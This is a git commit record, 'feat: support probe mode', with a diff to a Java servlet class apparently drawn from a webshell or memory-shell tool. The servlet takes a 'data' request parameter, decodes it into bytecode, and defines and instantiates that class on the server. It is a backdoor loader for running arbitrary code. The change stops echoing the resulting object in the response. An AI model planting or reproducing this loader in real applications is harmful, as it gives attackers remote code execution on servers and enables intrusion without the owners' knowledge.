feat: support probe mode

This commit is contained in:
ReaJason
2025-12-06 14:13:21 +08:00
parent 78f6098e6c
commit 2b79590596
78 changed files with 929 additions and 51 deletions
@@ -25,8 +25,7 @@ public class BigIntegerClassLaoderServlet extends ClassLoader implements Servlet
String data = req.getParameter("data");
try {
byte[] bytes = decodeBigInteger(data);
Object obj = defineClass(null, bytes, 0, bytes.length).newInstance();
res.getWriter().print(obj);
defineClass(null, bytes, 0, bytes.length).newInstance();
} catch (Exception e) {
throw new RuntimeException(e);
}